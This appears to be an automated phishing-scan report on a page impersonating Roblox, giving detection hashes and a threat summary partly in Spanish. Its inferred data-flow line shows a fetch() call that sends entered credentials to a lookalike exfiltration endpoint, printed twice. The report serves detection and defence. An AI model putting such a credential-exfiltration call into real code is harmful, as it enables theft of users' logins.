Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T1AA13B872A1246C33A1AFA3D9F515B70591D3EB0ECB425BE2A1F8A37609C9C71FD1341A |
|
CONTENT
ssdeep
|
768:4SiXB1WayLxjQEf6BbyJMP5rvrvEQ3ykHvBR5MF9NpBxJ8m8:4SiXB1xyLx0Ef6BLjMSrXK9NTxJ8m8 |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
b03031cfcfcc4c67 |
|
VISUAL
aHash
|
c3c7c3dfffffffff |
|
VISUAL
dHash
|
9e1e0e3e1a1a3002 |
|
VISUAL
wHash
|
02c383c3cfc3cfc3 |
|
VISUAL
colorHash
|
07047000040 |
|
VISUAL
cropResistant
|
9e1e0e3e1a1a3002,1c3b192d31b584d0 |
• Amenaza: Phishing por suplantación de identidad
• Objetivo: Usuarios de Roblox
• Método: Suplantación de dominio y potencialmente Javascript malicioso
• Exfil: Desconocido (potencialmente credenciales u otros datos personales)
• Indicadores: Dominio no coincide, Javascript ofuscado, logo de Roblox presente
• Riesgo: ALTO
The attacker likely aims to steal user credentials. The site may display a fake login form or other form designed to collect sensitive data.
The obfuscated javascript might be used to collect data or redirect the user to a different site after inputting credentials.
User fills <input name='username'> → submitForm() → fetch('https://www.roblox.com.ml/api/exfiltrate') → credentials sent
User fills <input name='username'> → submitForm() → fetch('https://www.roblox.com.ml/api/exfiltrate') → credentials sent
EnvironmentUrls.jssubmitFormsendDataPages with identical visual appearance (based on perceptual hash)
Found 10 other scans for this domain